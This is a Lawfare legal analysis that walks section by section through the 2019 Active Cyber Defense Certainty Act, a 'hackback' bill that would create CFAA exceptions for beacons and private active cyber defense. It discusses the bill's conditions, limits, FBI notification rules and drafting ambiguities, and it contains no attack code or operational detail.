Cybersecurity & Tech

Hackback Is Back: Assessing the Active Cyber Defense Certainty Act

Robert Chesney
Friday, June 14, 2019, 5:31 PM

The “hackback” debate has been with us for many years.

Published by The Lawfare Institute
in Cooperation With
Brookings

The “hackback” debate has been with us for many years. It boils down to this: Private-sector victims of hacking in some instances might wish to engage in self-defense outside their own networks (that is, doing some hacking of their own in order to terminate an attack, identify the attacker, destroy stolen data, etc.) but for the prospect that they then would face criminal (and possibly civil) liability under 18 USC § 1030 (the Computer Fraud and Abuse Act, or CFAA). A tricky question of policy therefore arises: Should the CFAA be pruned to facilitate hackback under certain conditions? On one hand, this might produce significant benefits in terms of reducing harm to victims and deterring some intrusions. On the other hand, risks involving mistaken attribution, unintended collateral harms and dangerous escalation abound. It’s small wonder the hackback topic has spawned so much interesting debate (see here and here for examples).

It also has spawned specific legislative proposals. Rep. Tom Graves (R.-Ga.) made a splash in 2017 when he introduced H.R. 4036, a bipartisan bill memorably titled the Active Cyber Defense Certainty Act—that is, the ACDC Act. The bill excited a great deal of commentary, but it never emerged from committee.

Well, the ACDC Act is back (and, yes, I feel duty bound to say that it is Back in Black, that the bill addresses Dirty Deeds, and that critics fear it puts us on a Highway to Hell). The new bill, jointly sponsored by Graves as well as Rep. Josh Gottheimer (D.-N.J.) is here.

Here’s a section-by-section analysis:

Section 1: Short Title

Nothing to see here.

Section 2: Congressional Findings

Mostly what you would expect, but there are some interesting nuggets here, including a suggestion that the Department of Justice should try to generate a “protocol for entities who are engaged in active cyber defense in the dark web so that these defenders can return private property such as intellectual property and financial records gathered inadvertently.”

Now, on to the substantive provisions.

Section 3: Exceptions for the Use of Attributional Technology

This section is meant to facilitate the use of beacons. “Beacon” can mean various things, but the basic idea is simple: A potential victim includes code in a file on their own system, and in the event someone copies and exports the code, it will not only attempt to phone home to the victim but, in doing so, will also convey some amount of forensic detail regarding its current location. Think of it like a bank that sticks a GPS tracker, and maybe also a camera or recording device, in a bag of cash that might get stolen from the bank vault.

It is not entirely clear that use of beacons in this scenario actually violates the CFAA, but many people have long feared that it might, and this has deterred reliance on that otherwise-smart defensive technique. In 2015, Congress flirted with a fix, in the “defensive measures” sections of the Cybersecurity Information Sharing Act (CISA). The language of CISA was not nearly clear enough to resolve the uncertainty about CFAA’s applicability to beacons, though, and that brings us to Section 3 of the ACDC Act.

This section would make clear that the CFAA does not apply to a beacon scenario when these conditions are met. The beacon:

1) Must elicit “locational or attributional data” (with attributional data defined broadly to mean “log files, text strings, time stamps, malware samples, identifiers such as user names and Internet Protocol addresses and metadata or other digital artifacts gathered through forensic analysis”).

2) Must originate within the defender’s system.

3) Must not destroy data or impair essential functionality of the attacker’s system.

4) Must not result in a backdoor such that the defender now has active access (the phrase they use is “intrusive access”).

Note: This arguably leaves space for a “beacon+” approach, in which the code in question does not just elicit and transmit the forensic information but also takes further defensive steps of a nondestructive nature such as locking up stolen data (that is, encrypting it while leaving it in place) or even doing the same to other data on the attacker’s system (which might be data stolen from others, or the attacker’s own data). That sort of thing does not seem to be the aim of this provision, and one can certainly argue that it would be beyond scope. Still, if not meant to be greenlighted, then it would probably be best to be clearer that such steps are not covered in this section.

Might they be covered by some other section of the ACDC, though? Read on!

Section 4: Exclusion From Prosecution for Certain Computer Crimes for Those Taking Active Cyber Defense Measures

The beacon scenario above presumes that the victim will have planned ahead, hiding code in a to-be-stolen file that will then try to phone home. But not every victim will have taken that step, and even when they do it won’t always work. What if the victim instead (or in addition) wants or needs to try other means once an attack occurs? And, for that matter, what about taking steps to actually shut down or mitigate an in-progress attack? Well, simply put, sometimes the victim understandably would like to hack back—particularly if time is of the essence, and if it does not seem that government authorities will intervene effectively or at all.

As things currently stand, such steps would violate the CFAA, assuming they involve accessing the systems of others (the attacker’s system or intermediary systems through which the attacker is routing or staging things) without authorization. The point of Section 4 is to change this, subject to certain conditions.

Specifically, Section 4 would establish an affirmative defense to CFAA charges for actions that qualify as “active cyber defense measures” (I’ll abbreviate that as ACDMs). Obviously, then, the definition of that phrase is critical. Let’s have a look.

There are three major moving parts to the definition: a description of which systems are the proper objects of an ACDM response from a victim, a list of three proper purposes for ACDMs and a list of seven forbidden actions. We’ll go through that in order.

Proper object for an ACDM: As an initial matter, note that an ACDM is defined with reference to actions on behalf of the victim that access “the computer of the attacker” without authorization. Certainly that’s the heart of the idea. But note that the “computer of the attacker” is a phrase that can be construed narrowly or broadly. If construed strictly, it might be thought to exclude systems that the attacker has exploited and made part of the attack chain but that do not actually belong to the attacker. Since the use of such intermediary systems, or chains of intermediaries, is commonplace, this is an important distinction. Later in the definition, as I note below, there is in fact a reference to ACDMs impacting an “intermediary computer,” and so it seems clear the drafters do intend for ACDMs to reach them. At any rate, it would be best to make that clear at the outset by referring to “the computer of the attacker as well as any ‘intermediary computer’ through which the attack was or is routed.”

Proper purposes for an ACDM: Let’s now assume we know which systems are included as proper objects for an ACDM. The victim’s actions will count as an ACDM only if intended to accomplish one of three things:

1) “[E]stablish attribution of criminal activity,” which then would be shared with law enforcement and other relevant government agencies.

2) “[D]isrupt continued unauthorized activity against the defender’s own network.”

3) “[M]onitor the behavior of an attacker to assist in developing future intrusion prevention or cyber defense techniques.”

The first two items on that list (attribution and disruption of ongoing attack) are about what one would expect to see here, and what they mean is relatively clear. The third one on the list is different, both in terms of clarity and especially in terms of its relationship to the immediate goal of protection in the face of an attack. Simply put, it is quite forward looking and, arguably, rather boundless in terms of what it might encompass from an information-collection perspective.

Forbidden actions for an ACDM: Now let’s assume we have both a proper object for the ACDM and the right sort of intent. The bill lists seven forbidden effects, plainly with the intent to address concerns that have been raised about the undesirable harms that might occur if ACDMs are encouraged through removal of the CFAA obstacle. The list includes:

1) Intentionally destroying someone else’s data (note that accidental destruction is okay in this view, as is intentional destruction of the victim’s own [stolen] data).

2) Recklessly causing physical injury or financial loss (with the financial loss apparently defined with reference to 18 USC § 1030(c)(4), which specifies a $5,000 threshold).

3) Creating a “threat to the public health or safety” (without reference to intent or foreseeability, and without definition of those terms).

4) Insofar as the ACDM impacts an “intermediary computer,” intentionally doing more than is needed to perform “reconnaissance” on that computer for attribution purposes (a limitation that is fine if the only permissible purpose of an ACDM is attribution but that might be too strict if another aim really is to enable the victim to stop an ongoing attack).

5) Intentionally “results in intrusive or remote access into an intermediary’s computer” (a condition that might be hard to square with the whole idea of using an ACDM to hack into the intermediary computer to begin with, though obviously the underlying spirit of this condition is simply to ensure that the hackback does not turn into something broader than necessary for the limited purposes noted above).

6) Intentionally disrupting someone’s internet access on a “persistent” basis if doing so produces actual damages of the kind described in the CFAA.

7) “[I]mpacts” computers that handle national defense information, government computers in general, and computers used by or for government law enforcement and national defense/security purposes (so, attackers should be sure to try and route attacks through at least one such computer!).

Plenty to say about these situations, but I’ve tried to flag the key questions in the parentheticals above and won’t repeat those points now.

Section 5: Notification Requirement for the Use of ACDMs

Let’s now assume we have a victim who plans to use an otherwise-proper ACDM pursuant to Section 4. Section 5 imposes a procedural prerequisite: advance notice to the FBI National Cyber Investigative Joint Task Force (including an obligation to await notification from NCI-JTF that they did receive said notification). Section 5 specifies various things that must be included in the notice. Note: As Kristin Eichensehr observed about the original bill in the last Congress, looping in the government in this way opens the door to the argument that the private actor’s conduct at that point might be attributable to the U.S. government, for purposes of determining state responsibility for action that someone might claim violates international law.

So, what good might be served by such advance notifications? For starters, it means that a victim entity must proceed without doubt that the FBI will know something is afoot, which perhaps will have a useful chilling effect for unduly aggressive ideas. But more formally, as we see in the next section, it also invites the FBI to intervene before the ACDM is put into play.

Section 6: Voluntary Preemptive Review of ACMDs

This section requires the FBI to establish a two-year pilot project in which victims intending to engage in an ACDM can choose not just to give the required advance notice but also further to ask the FBI (and other agencies) to weigh in on how the planned ACDM might be refined to ensure it stays within the boundaries described above, as well as to improve technical efficacy. The statute is ambiguous as to what burdens then would fall on the FBI from a resource and timing perspective, other than to say that the FBI decides how to prioritize its response to such voluntary requests.

Notice that this falls short of stating that the Justice Department would give some kind of letter ruling ensuring that the victim entity will not face liability if it carries through with the ACDM, but it nonetheless would surely have a similar effect so long as the victim entity adheres to the notified parameters and any resulting advice.

Section 7: Annual Report on the Federal Government’s Progress in Deterring Cyber Fraud and Cyber-Enabled Crimes

At this point the bill pivots away toward more general issues involving cyber crime, calling for the Department of Justice to consult with other agencies to produce an annual report with a variety of cyber crime and enforcement statistics. That said, the bill does call for the annual report to include the number of ACDM notifications in a given year plus a substantive evaluation of the ACDM system.

Section 8: Requirement for the Department of Justice to Update the Manual on the Prosecution of Cyber Crimes

The Justice Department’s computer crimes manual would have to be updated to reflect this bill (which I’m sure they’d be inclined to do anyway, but no harm in requiring it, I suppose). This section also would “encourage[]” the department to take steps to keep the public informed on specific “defensive techniques and cyber technology that can be used” without violating CFAA; a good idea, but if not actually required then this probably won’t change too much for the department’s Computer Crime and Intellectual Property Section.

Section 9: Sunset

The statute includes a two-year sunset, which is smart, but notice that the sunset is framed in a funny (and arguably limiting) way: It refers only to the “exclusion from prosecution created by this Act” as opposed to the act as a whole or to, say, all of Sections 3 through 6. Why does that matter? It matters because, as you may have noticed if you read carefully, the Section 3 “beacon” rule is clearly an exclusion from prosecution under the CFAA, whereas the Section 4 ACDM rule is framed as the creation of an affirmative defense. I suspect the sunset is meant to cover both, but as currently written it might be construed to reach only Section 3 (the much-less controversial part of the ACDC Act). Easily fixed, of course.

Okay, I hope you found that helpful. And now, as a reward for those who read this far and have AC/DC music on the brain as a result, take a few moments to enjoy the simple but brilliant opening riff for Have a Drink on Me.


Robert (Bobby) Chesney is the Dean of the University of Texas School of Law, where he also holds the James A. Baker III Chair in the Rule of Law and World Affairs at UT. He is known internationally for his scholarship relating both to cybersecurity and national security. He is a co-founder of Lawfare, the nation’s leading online source for analysis of national security legal issues, and he co-hosts the popular show The National Security Law Podcast.

Subscribe to Lawfare